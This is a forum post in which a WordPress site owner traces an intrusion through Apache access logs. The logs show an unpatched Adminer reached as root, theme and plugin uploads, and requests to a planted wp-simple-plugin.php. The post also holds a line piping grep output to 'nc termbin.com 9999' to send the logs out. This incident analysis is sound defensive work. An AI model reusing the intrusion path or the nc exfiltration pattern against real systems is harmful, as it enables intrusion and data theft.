172.69.55.79 - - [03/Feb/2020:16:09:57 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
::1 - - [03/Feb/2020:16:09:58 -0500] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
163.172.44.118 - - [03/Feb/2020:16:09:59 -0500] "GET / HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0 Safari/537.36 Firefox/66.0"
108.162.229.179 - - [03/Feb/2020:16:09:59 -0500] "GET / HTTP/1.1" 200 6645 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0 Safari/537.36 Firefox/66.0"This fuqqer infected me last time, and I overlooked this infection clearing it off.
See this bullshit?
Now we know Dec 10 17:07 is a time of interest..
Code:
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:36 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:38 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2591 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.94.53 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3235 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.109 - - [10/Dec/2019:17:07:39 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.89.190 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:40 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2687 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.25 - - [10/Dec/2019:17:07:40 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.91.230 - - [10/Dec/2019:17:07:41 -0500] "GET /adminI am tracing this attack back to Cloudflare, but this is not Cloudflare's fault, this is my own damn fault for not enabling the Cloudflare module to have the attacker's real fuqqqking IP logged. I know they're around/from Germany/Netherlands/Europe region though since their location of the CDN is that direction.
So I am going to grep for "172.69" and "162.158"
...
zgrep -a "10/Dec/2019:17:0" *gz | grep "172.69"
and
zgrep -a "10/Dec/2019:17:0" *gz | grep "162.158"
I am obviously going to add | nc termbin.com 9999
To exfil these logs.
Code:
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:30 -0500] "GET /adminer-4.2.5.php HTTP/1.1" 200 2295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:33 -0500] "GET /adminer-4.2.5.php?server=localhost&username=root&&sql= HTTP/1.1" 200 2541 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:35 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:36 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:40 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2687 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.25 - - [10/Dec/2019:17:07:40 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:43 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2745 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:43 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2970 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.25 - - [10/Dec/2019:17:07:43 -0500] "POST /wp-login.php HTTP/1.1" 200 2557 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:44 -0500] "GET /wp-admin/customize.php HTTP/1.1" 200 50365 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:47 -0500] "POST /wp-login.php HTTP/1.1" 200 2556 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:48 -0500] "GET /wp-admin/profile.php HTTP/1.1" 200 12877 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:49 -0500] "GET / HTTP/1.1" 206 6147 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:56 -0500] "GET /wp-admin/theme-install.php?browse=featured HTTP/1.1" 200 13107 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:57 -0500] "POST /wp-admin/update.php?action=upload-theme HTTP/1.1" 200 9137 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:58 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 369 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:58 -0500] "GET /wp-admin/plugin-install.php HTTP/1.1" 200 15335 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:08:03 -0500] "GET /wp-admin/customize.php HTTP/1.1" 200 50368 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:08:05 -0500] "GET /wp-admin/options-general.php HTTP/1.1" 200 18686 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:08:07 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3010 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:08:08 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3061 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:08:09 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3074 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
Code:
access.log.8.gz:162.158.91.230 - - [10/Dec/2019:17:07:29 -0500] "GET /adminer-4.2.5.php HTTP/1.1" 200 2300 "-" "Go-http-client/1.1"
access.log.8.gz:162.158.92.105 - - [10/Dec/2019:17:07:32 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 302 448 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:38 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2591 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.94.53 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3235 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.109 - - [10/Dec/2019:17:07:39 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.89.190 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.91.230 - - [10/Dec/2019:17:07:41 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2728 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:42 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:46 -0500] "GET /wp-login.php HTTP/1.1" 200 1795 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:51 -0500] "GET /wp-admin/theme-editor.php?file=header.php&theme=photographer-wp HTTP/1.1" 200 13144 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.89.172 - - [10/Dec/2019:17:07:52 -0500] "GET /wp-admin/theme-editor.php?file=header.php&theme=photographer-wp HTTP/1.1" 200 13144 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.90.171 - - [10/Dec/2019:17:07:53 -0500] "GET /wp-admin/theme-editor.php?file=footer.php&theme=photographer-wp HTTP/1.1" 200 12475 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.88.197 - - [10/Dec/2019:17:07:54 -0500] "GET /wp-admin/theme-editor.php?file=functions.php&theme=photographer-wp HTTP/1.1" 200 36617 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.90.21 - - [10/Dec/2019:17:07:55 -0500] "POST / HTTP/1.1" 206 6145 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.88.197 - - [10/Dec/2019:17:08:00 -0500] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 403 2021 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.91.124 - - [10/Dec/2019:17:08:01 -0500] "POST /wp-content/plugins/supersociall/supersociall.php HTTP/1.1" 404 4632 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.109 - - [10/Dec/2019:17:08:02 -0500] "POST /wp-admin/options.php HTTP/1.1" 403 2039 "http://CUSTOMERCOMPANY.com/wp-admin/options-general.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.88.95 - - [10/Dec/2019:17:08:03 -0500] "POST /wp-login.php HTTP/1.1" 200 2557 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.105 - - [10/Dec/2019:17:08:06 -0500] "POST /wp-admin/options.php HTTP/1.1" 302 489 "http://CUSTOMERCOMPANY.com/wp-admin/options-general.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.94.77 - - [10/Dec/2019:17:08:07 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2806 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.90.21 - - [10/Dec/2019:17:08:08 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2841 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.89.190 - - [10/Dec/2019:17:08:09 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2871 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"What does this shit mean? I traced this all the way back to an Adminer exploit. Someone left an unpatched Adminer on the system *cough cough, not me.. totally was me*. Ah well, we all fk up sometimes.
Evidence not to leave tools floating around public-facing.. dddaaaayummmiittttt h00000m0000000z stoooop hacccckking me lol
